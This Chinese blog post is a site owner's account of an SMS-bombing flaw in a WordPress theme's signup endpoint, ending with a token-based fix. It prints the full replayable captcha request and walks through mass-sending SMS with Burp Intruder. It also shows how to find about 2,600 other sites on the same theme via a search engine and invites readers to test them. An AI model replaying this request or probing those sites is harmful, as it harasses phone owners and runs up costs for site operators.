杂谈
深夜醒来,接收到了阿里的短信提醒
![图片[1]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328041537629.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
想想我这个日活5-6k人的小站也被黑产盯上了?我记得在短信注册的时候是有滑动验证的
![图片[2]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328041624887.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
难道说?这里面有漏洞?
漏洞复现
我们打开burpsuite,启用拦截功能,可以看到intercept is on
![图片[3]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042003136.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这里打开一个注册页面,输入手机号然后点击获取验证码
![图片[4]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328041738635.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后,会出现图像滑块验证,我们进行滑动,然后抓包
![图片[5]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328041826847-1024x659.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们可以看到payload如下,主要的参数即为email_phone=
,后面接上手机号
name=&email_phone=你的手机号&captch=&captcha_type=email_phone&password2=&action=signup_captcha&slidercaptcha%5Bspliced%5D=true&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Bverified%5D=true
那么,我们来测试下,这个验证码是否能被重复利用,我们右键,选择Send to Repeater
![图片[6]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042040417-1024x577.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后看看能不能修改号码重新发包,我这里改成另一个手机号,点击send
发送
![图片[7]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042153541-1024x655.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
居然发送成功了
![图片[8]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042248855-1024x298.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后,我看了下手机,确实收到了
![图片[9]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042311584.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
那么,那些做黑产的又是如何通过我们这个漏洞制造的短信轰炸呢?
他们有很多代理池,通过频繁请求我们刚才的接口就可以完成所谓的短信轰炸……
这里,我们也简单来讲解一下,其实通过burpsuite里的暴破模式也可以间接实现
我们把刚才的包发送到入侵模块,点击Send to Intruder
![图片[10]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042446252-1024x895.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们先点击clear
,清除没用的变量
![图片[11]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042600280-1024x461.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后,我们勾选手机号作为变量,点击Add $
,他会在你的手机号前后都加上$
![图片[12]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042649597-1024x390.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后我们在payload中,导入任意手机号,你可以自行生成一些随机的手机号
我们随便生成了100个
![图片[13]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042823818.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后点Load导入
![图片[14]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042737180.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后点击start attack,短信就会被疯狂刷了,一条四分钱,猪猪直接流泪
![图片[15]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042923315-1024x514.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后就看到短信喀喀喀的被刷了……
![图片[16]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043110287-1024x717.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
实录
由于猪猪的主题用的是子比主题,很多同行站长也表示,实在是太难受了
![图片[17]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043255143.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
看看视频里的就很惨哦
如何发现其他有此接口的同类站长
我们可以参考之前的文章
这里使用的奇安信的hunter平台,我们先获取icon
![图片[18]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043803332-1024x567.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后上传
![图片[19]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043647850-1024x614.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
点击确定,就可以搜索了
![图片[20]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043720773.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
hunter这里只爆了5个资产
![图片[21]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043750499-1024x315.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
看样子图标不太行,我们再换一种搜索方式
web.body="子比"
![图片[22]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043907742.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
看起来这个就很多了,可以看到有2600多条资产
![图片[23]-记猪头网站短信利用漏洞-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043930549-1024x458.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后,你就可以去测试了,看看这里面的网站是不是也存在我这样的漏洞呢?
如何修复漏洞
修复漏洞这里建议采用token验证方式,需要服务端生成token然后每次请求短信接口都需要做token校验,token如果不正确则无法发送短信!单纯的验证IP几乎是无效的策略!
- 最新
- 最热
只看作者